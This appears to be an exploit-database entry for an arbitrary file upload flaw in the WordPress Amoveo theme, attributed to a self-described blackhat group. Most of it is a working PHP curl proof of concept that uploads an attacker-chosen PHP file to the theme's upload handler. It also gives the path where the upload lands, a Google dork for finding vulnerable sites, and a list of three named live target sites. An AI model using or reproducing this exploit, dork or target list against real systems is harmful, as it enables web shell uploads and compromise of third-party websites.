id: 21451
date: 11/02/2013
title: WordPress Amoveo Themes Arbitrary File Upload Vulnerability
author: Byakuya
cves: 

###################################################################################################
#_________            .___        _______                ___.   .__        
#\_   ___ \  ____   __| _/____    \      \   ______  _  _\_ |__ |__| ____  
#/    \  \/ /  _ \ / __ |/ __ \   /   |   \_/ __ \ \/ \/ /| __ \|  |/ __ \ 
#\     \___(  <_> ) /_/ \  ___/  /    |    \  ___/\     / | \_\ \  \  ___/ 
# \______  /\____/\____ |\___  > \____|__  /\___  >\/\_/  |___  /__|\___  >
#        \/            \/    \/          \/     \/            \/        \/ 
###################################################################################################
# Exploit Title: WordPress Amoveo Themes Arbitrary File Upload Vulnerability
# Author: Byakuya
# Date: 11/02/2013
# Vendor Homepage: http://www.wphub.com/
# Themes Link: http://www.wphub.com/themes/amoveo-by-themeforest/
# Price: $35
# Affected Version: v1.0
# Infected File: upload_handler.php
# Category: webapps/php
# Google dork: inurl:/wp-content/themes/amoveo/
# Tested on : Windows/Linux
###################################################################################################

# Exploit & POC :

<?php
$uploadfile="up.php"; 
$ch = curl_init("http://127.0.0.1/wordpress/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php");
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
 
?>

#File path: 
http://127.0.0.1/wordpress/wp-content/uploads/[year]/[month]/up.php

#Live Target :
http://www.candlewoodequine.com/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php
http://calvertlabs.com/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php
http://www.drtomroselle.com/wp-content/themes/amoveo/includes/fileuploader/upload_handler.php

#Credit: ./Byakuya ./Mr Ohsem ./Cai ./RatKid ./Agam ./Lord-Router ./X-Tuned ./Official Code-Newbie
#Facebook: https://www.facebook.com/CodeNewbieCrew
#Website: http://www.codenewbie.net
#Malaysia & Indonesia BlackHat
###################################################################################################

#  0day.today [2023-03-22]  #